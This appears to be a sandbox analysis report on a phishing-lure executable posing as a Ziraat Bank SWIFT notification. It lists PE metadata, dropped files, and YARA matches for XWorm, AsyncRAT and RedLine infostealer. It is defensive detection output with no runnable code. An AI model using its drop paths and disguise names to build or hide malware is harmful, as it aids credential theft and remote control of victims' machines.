Source: C:\Users\user\AppData\Local\differences\niellist.exe	Code function: 17_2_033FD580	17_2_033FD580
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_02CC1385	19_2_02CC1385
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_02CC1315	19_2_02CC1315
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_02CC1335	19_2_02CC1335
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_02CC1021	19_2_02CC1021
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_02CC1030	19_2_02CC1030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_05A305E8	19_2_05A305E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_05A305F8	19_2_05A305F8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 21_2_00007FFC3C8130E9	21_2_00007FFC3C8130E9

Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe

Process token adjusted: Load Driver

Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe

Process token adjusted: Security

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: String function: 0040E1D8 appears 44 times
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: String function: 00407DE1 appears 35 times
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: String function: 00428900 appears 41 times
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: String function: 00420AE3 appears 70 times

Source: chrmstp.exe.2.dr	Static PE information: Resource name: RT_STRING type: DOS executable (COM, 0x8C-variant)
Source: chrmstp.exe.2.dr	Static PE information: Resource name: RT_STRING type: DOS executable (COM, 0x8C-variant)
Source: setup.exe.2.dr	Static PE information: Resource name: RT_STRING type: DOS executable (COM, 0x8C-variant)
Source: setup.exe.2.dr	Static PE information: Resource name: RT_STRING type: DOS executable (COM, 0x8C-variant)
Source: updater.exe.2.dr	Static PE information: Resource name: RT_STRING type: CLIPPER COFF executable (VAX #) not stripped - version 71
Source: Acrobat.exe.2.dr	Static PE information: Resource name: RT_STRING type: DOS executable (COM, 0x8C-variant)
Source: SingleClientServicesUpdater.exe.2.dr	Static PE information: Resource name: 7Z type: 7-zip archive data, version 0.4
Source: SingleClientServicesUpdater.exe0.2.dr	Static PE information: Resource name: 7Z type: 7-zip archive data, version 0.4

Source: notification_helper.exe.2.dr	Static PE information: Number of sections : 11 > 10
Source: msedgewebview2.exe.2.dr	Static PE information: Number of sections : 14 > 10
Source: msedge_pwa_launcher.exe.2.dr	Static PE information: Number of sections : 13 > 10
Source: identity_helper.exe.2.dr	Static PE information: Number of sections : 12 > 10
Source: msedge_proxy.exe.2.dr	Static PE information: Number of sections : 12 > 10
Source: elevated_tracing_service.exe.2.dr	Static PE information: Number of sections : 12 > 10
Source: pwahelper.exe.2.dr	Static PE information: Number of sections : 12 > 10
Source: ie_to_edge_stub.exe.2.dr	Static PE information: Number of sections : 11 > 10
Source: chrmstp.exe.2.dr	Static PE information: Number of sections : 14 > 10
Source: notification_click_helper.exe.2.dr	Static PE information: Number of sections : 13 > 10
Source: setup.exe0.2.dr	Static PE information: Number of sections : 13 > 10
Source: firefox.exe.2.dr	Static PE information: Number of sections : 11 > 10
Source: chrome_pwa_launcher.exe.2.dr	Static PE information: Number of sections : 11 > 10
Source: os_update_handler.exe.2.dr	Static PE information: Number of sections : 12 > 10
Source: setup.exe.2.dr	Static PE information: Number of sections : 14 > 10
Source: elevation_service.exe.2.dr	Static PE information: Number of sections : 12 > 10

Source: Ziraat_Bankasi_Swift-Messaji_Notifications.exe, 00000000.00000003.1257862399.0000000003F40000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameALG.exej% vs Ziraat_Bankasi_Swift-Messaji_Notifications.exe
Source: Ziraat_Bankasi_Swift-Messaji_Notifications.exe, 00000000.00000003.1253495338.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamearmsvc.exeN vs Ziraat_Bankasi_Swift-Messaji_Notifications.exe

Source: Ziraat_Bankasi_Swift-Messaji_Notifications.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: 9.2.RegSvcs.exe.2e60d94.4.unpack, type: UNPACKEDPE	Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 9.2.RegSvcs.exe.2e60d94.4.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 3.2.niellist.exe.4000000.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 17.2.niellist.exe.4d10000.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 9.2.RegSvcs.exe.2e57738.2.raw.unpack, type: UNPACKEDPE	Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 9.2.RegSvcs.exe.2e57738.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 9.2.RegSvcs.exe.3eaebc0.8.unpack, type: UNPACKEDPE	Matched rule: infostealer_win_redline_strings author = Sekoia.io, description = Finds Redline samples based on characteristic strings, creation_date = 2022-09-07, classification = TLP:CLEAR, version = 1.0, id = 0c9fcb0e-ce8f-44f4-90b2-abafcdd6c02e
Source: 9.2.RegSvcs.exe.3f45010.6.raw.unpack, type: UNPACKEDPE	Matched rule: infostealer_win_redline_strings author = Sekoia.io, description = Finds Redline samples based on characteristic strings, creation_date = 2022-09-07, classification = TLP:CLEAR, version = 1.0, id = 0c9fcb0e-ce8f-44f4-90b2-abafcdd6c02e
Source: 9.2.RegSvcs.exe.3ef9df0.9.raw.unpack, type: UNPACKEDPE	Matched rule: infostealer_win_redline_strings author = Sekoia.io, description = Finds Redline samples based on characteristic strings, creation_date = 2022-09-07, classification = TLP:CLEAR, version = 1.0, id = 0c9fcb0e-ce8f-44f4-90b2-abafcdd6c02e
Source: 9.2.RegSvcs.exe.2e57738.2.unpack, type: UNPACKEDPE	Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 9.2.RegSvcs.exe.2e57738.2.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 9.2.RegSvcs.exe.2e60d94.4.raw.unpack, type: UNPACKEDPE	Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 9.2.RegSvcs.exe.2e60d94.4.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 9.2.RegSvcs.exe.3f45010.6.unpack, type: UNPACKEDPE	Matched rule: infostealer_win_redline_strings author = Sekoia.io, description = Finds Redline samples based on characteristic strings, creation_date = 2022-09-07, classification = TLP:CLEAR, version = 1.0, id = 0c9fcb0e-ce8f-44f4-90b2-abafcdd6c02e
Source: 10.0.build.exe.ef0000.0.unpack, type: UNPACKEDPE	Matched rule: infostealer_win_redline_strings author = Sekoia.io, description = Finds Redline samples based on characteristic strings, creation_date = 2022-09-07, classification = TLP:CLEAR, version = 1.0, id = 0c9fcb0e-ce8f-44f4-90b2-abafcdd6c02e
Source: 9.2.RegSvcs.exe.2e4e0f4.3.raw.unpack, type: UNPACKEDPE	Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 9.2.RegSvcs.exe.2e4e0f4.3.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 11.0.XClient.exe.cf0000.0.unpack, type: UNPACKEDPE	Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 11.0.XClient.exe.cf0000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 9.2.RegSvcs.exe.3ef9df0.9.unpack, type: UNPACKEDPE	Matched rule: infostealer_win_redline_strings author = Sekoia.io, description = Finds Redline samples based on characteristic strings, creation_date = 2022-09-07, classification = TLP:CLEAR, version = 1.0, id = 0c9fcb0e-ce8f-44f4-90b2-abafcdd6c02e
Source: 00000009.00000002.1304482234.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000011.00000002.1415424973.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000003.00000002.1302912222.0000000004000000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000009.00000002.1308147136.0000000002DF9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0000000B.00000000.1302946369.0000000000CF2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: C:\Users\user\AppData\Local\Temp\XClient.exe, type: DROPPED	Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: C:\Users\user\AppData\Local\Temp\XClient.exe, type: DROPPED	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: C:\Users\user\AppData\Roaming\XClient.exe, type: DROPPED	Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: C:\Users\user\AppData\Roaming\XClient.exe, type: DROPPED	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: C:\Users\user\AppData\Local\Temp\build.exe, type: DROPPED	Matched rule: infostealer_win_redline_strings author = Sekoia.io, description = Finds Redline samples based on characteristic strings, creation_date = 2022-09-07, classification = TLP:CLEAR, version = 1.0, id = 0c9fcb0e-ce8f-44f4-90b2-abafcdd6c02e

Source: Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: armsvc.exe.0.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: alg.exe.0.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: niellist.exe.0.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AppVClient.exe.0.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: officesvcmgr.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: chrome_pwa_launcher.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AutoIt3Help.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AutoIt3_x64.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: SciTE.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AdobeARMHelper.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: jaureg.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: jucheck.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: jusched.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: elevated_tracing_service.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: java.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: chrmstp.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: javaw.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: setup.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: javaws.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: notification_helper.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: os_update_handler.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: chrome_proxy.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: crashreporter.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: default-browser-agent.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: firefox.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: updater.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: maintenanceservice.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: elevation_service.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: maintenanceservice.exe0.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: jabswitch.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: java-rmi.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: java.exe0.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: javacpl.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: javaw.exe0.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: javaws.exe0.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: jjs.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: jp2launcher.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: keytool.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: kinit.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: elevation_service.exe0.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: 7z.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: 7zFM.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: 7zG.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: klist.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: ktab.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: orbd.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: pack200.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: policytool.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: rmid.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: rmiregistry.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: servertool.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: ssvagent.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: tnameserv.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: Acrobat.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AcrobatInfo.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: acrobat_sl.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AcroBroker.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: unpack200.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: ie_to_edge_stub.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
